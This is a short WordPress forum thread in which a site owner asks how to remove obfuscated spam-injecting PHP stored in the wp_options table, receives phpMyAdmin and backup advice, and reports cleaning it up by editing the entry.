
[resolved] How to Eliminate Malicious Code from Database (3 posts)

  1. dworsky
    Member
    Posted 6 years ago #

    Through some security flaw, malicious code was entered into my database. Apparently it is obfuscated PHP code that adds drug-related text in the BEGIN TITLE HEAD BAR section of my index template.

    I know nothing about editing a SQL database and do not know how to use phpMyAdmin. Could someone kindly walk me through, step by step, how to get rid of this offending code without screwing up everything?

    Here is what my hosting company said:

    The code isn't part of your scripts, it's contained in your WordPress database under the wp_options table, the row with option_id "78", option_name "blog_headers" contains the bad code showing on your site. Your theme displays this code with this:

    <?php $wp_headers() ?>

    You'll notice a long string of numbers/letters in the above mentioned database field, specifically:


    The above is base64 encoded, if you use a decoder you can see the bad code your site is executing at this point. For simplicity's sake I have included a webpage-based encoder/decoder so you can just copy & paste the above string and click decode it at the below site:

    http://makcoder.sourceforge.net/demo/base64.php

    You'll then see the code your site is executing, which is actually PHP code.
    =========

    Thanks in advance.

  2. MichaelH
    Member
    Posted 6 years ago #

    Knowing how to use phpMyAdmin is a valuable skill. Take a look at this article, phpMyAdmin Tutorial for an introduction to the subject.

    Then read Podz' article on changing the site-url.

    At that point you have an idea on how you edit a record (row) in wp_options. Now just find the rows you need to delete in wp_options and instead of clicking on the Edit icon, click on the Delete icon (big red X).

    Also, remember you should always have a database backup before attempting direct changes to your database so please review and follow the instructions in Backing_Up_Your_Database.

  3. dworsky
    Member
    Posted 6 years ago #

    Michael,

    Thanks for your help.

    I actually figured out how to edit the offending code out and did not delete the entry because it was needed for the real header.

    Edgar

Topic Closed

This topic has been closed to new replies.
